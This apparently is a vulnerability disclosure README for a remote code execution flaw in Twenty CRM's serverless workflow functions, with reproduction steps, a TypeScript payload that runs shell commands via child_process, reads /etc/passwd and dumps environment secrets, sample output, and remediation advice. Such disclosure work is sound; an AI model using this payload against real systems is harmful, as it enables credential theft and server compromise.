dillonkirsch/CVE-2026-26720-Twenty-RCE


Twenty CRM - Authenticated Remote Code Execution (RCE)

Overview

Product: Twenty CRM

Vulnerability: Remote Code Execution (RCE) via Serverless Workflow Functions

Severity: Critical

Affected Component: Workflow Automation (Code - Serverless Function)

Tested Version: v1.15.0

This repository documents a critical vulnerability in the Twenty CRM workflow engine. The "Code - Serverless Function" component allows authenticated users to execute arbitrary Node.js code. Due to a lack of sandboxing, it is possible to import the child_process module and execute system-level commands on the host server.

Vulnerability Details

The application allows users to create custom automation workflows that include a code execution step. While this is intended for data manipulation, the execution environment does not properly restrict access to Node.js built-in modules or the underlying operating system.

An attacker can utilize execSync from the child_process library to:

  1. Execute shell commands (e.g., cat, ls, whoami).
  2. Read sensitive files from the file system (e.g., /etc/passwd).
  3. Dump environment variables (process.env), revealing database credentials, API keys, and application secrets.

Proof of Concept (PoC)

Steps to Reproduce

  1. Log in to Twenty CRM.
  2. Navigate to Settings > Workflows.
  3. Create a new Workflow with a Manual Trigger.
  4. Add an action: Code - Serverless Function.
  5. Paste the following TypeScript payload into the code editor:

import { execSync } from 'child_process';

export const main = async (params: any): Promise<object> => {
  try {
    // 1. Remote Command Execution: Read system users
    const output = execSync('cat /etc/passwd').toString();

    // 2. Information Disclosure: Dump all environment variables (Secrets)
    const secrets = JSON.stringify(process.env);

    return {
      data: output,
      secrets: secrets
    };
  } catch (e: any) {
    return { error: e.message };
  }
};

  6. Save and Run the workflow.

Code Overview

Observed Output

The workflow executes successfully and returns the system data.

System File Access (/etc/passwd):

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
postgres:x:70:70:PostgreSQL user:/var/lib/postgresql:/bin/sh
...

Environment Variables Leaked: The process.env dump revealed critical configuration details:

  • PG_DATABASE_URL (Database Credentials)
  • APP_SECRET (Signing keys)
  • REDIS_URL
  • AWS_ACCESS_KEY (If configured)

Impact

This vulnerability allows an authenticated user (with permissions to create workflows) to achieve Full System Compromise.

  • Confidentiality: Attackers can read all data in the database and file system.
  • Integrity: Attackers can modify application code, delete data, or inject malware.
  • Availability: Attackers can shut down the server or consume all resources.

Remediation

To fix this issue, the "Serverless Function" feature requires proper isolation.

  • Implement Sandboxing: Code should be executed in a restricted environment (e.g., a VM2 sandbox, a dedicated Docker container with no network/volume access, or a micro-VM like Firecracker).
  • Restrict Modules: Disable access to sensitive Node.js modules such as child_process, fs, and net.
  • Environment Variable Scrubbing: Ensure the execution context does not inherit the parent process's environment variables (which contain the app's secrets).

Timeline

  • Jan 8, 2026: Vulnerability discovered.
  • [Date]: Reported to Twenty CRM Security Team.
  • [Status]: Awaiting Patch.
